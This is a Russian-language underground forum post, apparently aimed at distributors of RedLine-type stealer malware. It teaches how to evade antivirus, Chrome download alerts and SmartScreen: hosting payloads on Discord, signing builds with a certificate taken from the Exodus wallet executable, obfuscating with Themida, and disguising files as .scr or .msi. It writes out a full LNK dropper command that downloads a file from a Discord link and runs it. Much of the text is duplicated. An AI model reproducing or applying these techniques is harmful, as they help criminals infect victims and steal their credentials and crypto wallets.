- Автор темы overlocker
- Дата начала
Всем любителям проливов привет! Для вас есть информация...
В данной статье будет разобраны некоторые "байпассы", которые многим проливерам не дают спокойно жить :)
Для многих новичков в теме логов первым же вопросом после "а как спрятать редлайн" появляется "а как найти криптора\почему хром орёт\как убрать смартскрин и тд".
Сегодня мы с Вами разберём все эти темы, а самые внимательные в конце статьи найдут приятный бонус (за эту услугу берут какие-то больные деньги, хз почему).
Итак, приступим.
ДЕТЕКТЫ
*Очень подробная статья о крипте мальвари, что такое фуд, семи-фуд, скантайм и райнтайм читайте в .
Что же такое детект и с чем его едят?
Вроде, всё просто, это распознавание твоего билда АВ системами с помощью средств анализа кода, НО
Знали ли вы, что чаще всего это не только анализ кода, но ещё и анализ источника файла (домен) , даты создания файла , сертификата безопасности и даже иконки файла.
Честно, я сам а*уел, но суровая действительность такова.
В связи с этой информацией мы с вами можем выделить 2 условных типа детектов, Прямой и Косвенный.
Прямой детект - распознавание средством анализа АВ систем файлика как вредоносного на основании совпадения его кода с сигнатурами, либо же анализ действий файла на ПК (вряд ли чит фортнайт будет смотреть в папку C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn ).
С прямыми детектами справится наверное даже самый рукожопый криптор, имеющий в своём арсенале только крякнутую темиду, это никогда не проблема, проблемы чаще всего начинаются дальше.
Косвенный детект - причина эпилепсии и слюнопускания всех, кто начинает лить. Это злое*учий Хромалерт и Смартскрин.
Всё это частенько реагирует отрицательно на вроде бы только что созданный и закриптованный билд, но почему?
ХромАлерт - Реагирует на источник скачиваемого файла, смотрит историю домена, его срок жизни и тд.
Смартскрин - Смотрит на подпись файла
СПОСОБЫ ОБХОДОВ
tags:
free, crypt, malware, fud, ink dropper, smartscreen, win defender, windows defender, chrome alert, bypass, win defender bypass, smartscreen bypass, chrome alert bypass, бесплатный, крипт, байпасс, вин дефендер, виндовс дефендер, смартскрин, хром алерт, фуд, криптуем, вирус, мальварь, стиллер, редлайн, windows defender bypass
В данной статье будет разобраны некоторые "байпассы", которые многим проливерам не дают спокойно жить :)
Для многих новичков в теме логов первым же вопросом после "а как спрятать редлайн" появляется "а как найти криптора\почему хром орёт\как убрать смартскрин и тд".
Сегодня мы с Вами разберём все эти темы, а самые внимательные в конце статьи найдут приятный бонус (за эту услугу берут какие-то больные деньги, хз почему).
Итак, приступим.
ДЕТЕКТЫ
*Очень подробная статья о крипте мальвари, что такое фуд, семи-фуд, скантайм и райнтайм читайте в .
Что же такое детект и с чем его едят?
Вроде, всё просто, это распознавание твоего билда АВ системами с помощью средств анализа кода, НО
Знали ли вы, что чаще всего это не только анализ кода, но ещё и анализ источника файла (домен) , даты создания файла , сертификата безопасности и даже иконки файла.
Честно, я сам а*уел, но суровая действительность такова.
В связи с этой информацией мы с вами можем выделить 2 условных типа детектов, Прямой и Косвенный.
Прямой детект - распознавание средством анализа АВ систем файлика как вредоносного на основании совпадения его кода с сигнатурами, либо же анализ действий файла на ПК (вряд ли чит фортнайт будет смотреть в папку C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn ).
С прямыми детектами справится наверное даже самый рукожопый криптор, имеющий в своём арсенале только крякнутую темиду, это никогда не проблема, проблемы чаще всего начинаются дальше.
Косвенный детект - причина эпилепсии и слюнопускания всех, кто начинает лить. Это злое*учий Хромалерт и Смартскрин.
Всё это частенько реагирует отрицательно на вроде бы только что созданный и закриптованный билд, но почему?
ХромАлерт - Реагирует на источник скачиваемого файла, смотрит историю домена, его срок жизни и тд.
Смартскрин - Смотрит на подпись файла
СПОСОБЫ ОБХОДОВ
Наверное, самый поддатливая для обхода АФ система.
Как было сказано выше - реагирует 99% случаев на домены.
Собственно говоря, нужен домен с именем, который позволяет загружать явно вредоносные файлы, да ещё и даёт хотлинк (прямая ссылка на скачивание) на них.
"Невозможно" - скажете вы. "Дискорд" - отвечу я.
Да-да, Тимспик для зумеров является ещё и неплохим файловым хранилищем для наших целей, но не спешите грузить ваш голый билдак в дис, всё ещё впереди.
Как было сказано выше - реагирует 99% случаев на домены.
Собственно говоря, нужен домен с именем, который позволяет загружать явно вредоносные файлы, да ещё и даёт хотлинк (прямая ссылка на скачивание) на них.
"Невозможно" - скажете вы. "Дискорд" - отвечу я.
Да-да, Тимспик для зумеров является ещё и неплохим файловым хранилищем для наших целей, но не спешите грузить ваш голый билдак в дис, всё ещё впереди.
Тут всё немного сложнее, поэтому вот скрины. Все действия производятся с оригинальным .ехе файлом коша Exodus (
):
После чего полученный сертификат мы пришиваем к билду (в большинстве стилеров в билдере есть кнопка типо Sign Build) и радуемся, либо же шьем его сами, .
Итак, у нас есть билд формата .ехе, чистый, мы его берём и обфусцируем той самой , о которой была речь выше.
!!! ОБЯЗАТЕЛЬНО ПОСЛЕ ТЕМИДЫ ПРОВЕРЯЕМ ОТСТУК !!!
Дальше нам на помощь приходят 2 волшебных формата - scr и msi, они в принципе не имеют прямых детектов, да и косвенные обходят невероятно бодро.
Чтобы ваш обфусцированный .ехе файл стал .scr нужно - заменить расширение .exe на .scr прямо в расширении файла. (да, вот так вот просто)
С Msi всё немного сложнее, нужен конвертер, (конечно же, туда можно подшивать всё, что угодно)
После всех вышеперечисленных действий ваш вредоносный файл становится безопасным для большинства файловых хранилищ по тиму mega, dropme и тд, а значит прямых детектов иметь не будет, так же очень легко обходит Win Defender и большинство антивирусных систем (на сканерах может показывать 3-5 детектов, но по сути это ничего не меняет, в рантайме файл не палится).
Для полноты картины мы идём в дискорд, грузим файлик и получаем прямую ссылку на скачивание по типу:
Далее идем в сокращалку ссылок, есть варианты или , но советую использовать последний, т.к. gg ссылки могут другие люди убивать.
После чего полученный сертификат мы пришиваем к билду (в большинстве стилеров в билдере есть кнопка типо Sign Build) и радуемся, либо же шьем его сами, .
Итак, у нас есть билд формата .ехе, чистый, мы его берём и обфусцируем той самой , о которой была речь выше.
!!! ОБЯЗАТЕЛЬНО ПОСЛЕ ТЕМИДЫ ПРОВЕРЯЕМ ОТСТУК !!!
Дальше нам на помощь приходят 2 волшебных формата - scr и msi, они в принципе не имеют прямых детектов, да и косвенные обходят невероятно бодро.
Чтобы ваш обфусцированный .ехе файл стал .scr нужно - заменить расширение .exe на .scr прямо в расширении файла. (да, вот так вот просто)
С Msi всё немного сложнее, нужен конвертер, (конечно же, туда можно подшивать всё, что угодно)
После всех вышеперечисленных действий ваш вредоносный файл становится безопасным для большинства файловых хранилищ по тиму mega, dropme и тд, а значит прямых детектов иметь не будет, так же очень легко обходит Win Defender и большинство антивирусных систем (на сканерах может показывать 3-5 детектов, но по сути это ничего не меняет, в рантайме файл не палится).
Для полноты картины мы идём в дискорд, грузим файлик и получаем прямую ссылку на скачивание по типу:
Далее идем в сокращалку ссылок, есть варианты или , но советую использовать последний, т.к. gg ссылки могут другие люди убивать.
Делаем свой Ink Dropper:
1. Как я описывал выше, криптуем, грузим в дискорд, сокращаем
2. Тыкаем правой кнопкой по рабочему столу, Создать, Ярлык
3. И начинаем писать в этой графе
По итогу у вас должна получится примерно такая строка
Файл безопасен, так что не переживайте, можете тестить.
4. Жмём далее.
5. Сохраняем файл с нужным нам именем, это может быть что угодно.
Жмём готово, получаем такое:
Но это еще не все, нужно заменить иконку под ваше расширение. Для этого меняем иконку через свойства файла. Если поставите какую-то свою иконку - то она не отобразится на другом пк, поэтому ставим стандартные иконки Windows.
По итогу получается вот такой вот дроппер, естественно FUD:
1. Как я описывал выше, криптуем, грузим в дискорд, сокращаем
2. Тыкаем правой кнопкой по рабочему столу, Создать, Ярлык
3. И начинаем писать в этой графе
C:\Windows\System32\cmd.exe - Обращение к приложению командной строки, это и так ясно/c - Параметр открытия командной строки , он означает , что она закроется после выполнения заданных командcd C:\Users\Public\Downloads - переход в определённую папку, настоятельно рекомендую использовать ту, что использую я, ибо она поддерживает редактирование и скачивание файлов без прав администратора и присутствует на всех Win машинах.& - вот эта закорючка означает, что после первой команды выполняется следующая, то есть, сначала мы перешли в директорию, потом сделали что-то другое.curl -o 1.txt https://cdn.discordapp.com/attachments/1004174278729662496/1009262188411752498/lozerix.txt - Эта команда отвечает за скачивание самого файла ( не стал сокращать, но вам советую) Аргумент -о отвечает за то, под каким именем сохранится файл, который будет скачан по ссылке, далее идёт сама ссылка на прямое скачивание файла.& start 1.txt - финальная строка не нуждается в пояснениях, думаю , из текущей директории выполнения запускается заданный файл.По итогу у вас должна получится примерно такая строка
C:\Windows\System32\cmd.exe /c cd C:\Users\Public\Downloads & curl -o 1.txt https://cdn.discordapp.com/attachments/1004174278729662496/1009262188411752498/lozerix.txt & start 1.txtФайл безопасен, так что не переживайте, можете тестить.
4. Жмём далее.
5. Сохраняем файл с нужным нам именем, это может быть что угодно.
Жмём готово, получаем такое:
Но это еще не все, нужно заменить иконку под ваше расширение. Для этого меняем иконку через свойства файла. Если поставите какую-то свою иконку - то она не отобразится на другом пк, поэтому ставим стандартные иконки Windows.
По итогу получается вот такой вот дроппер, естественно FUD:
tags:
free, crypt, malware, fud, ink dropper, smartscreen, win defender, windows defender, chrome alert, bypass, win defender bypass, smartscreen bypass, chrome alert bypass, бесплатный, крипт, байпасс, вин дефендер, виндовс дефендер, смартскрин, хром алерт, фуд, криптуем, вирус, мальварь, стиллер, редлайн, windows defender bypass
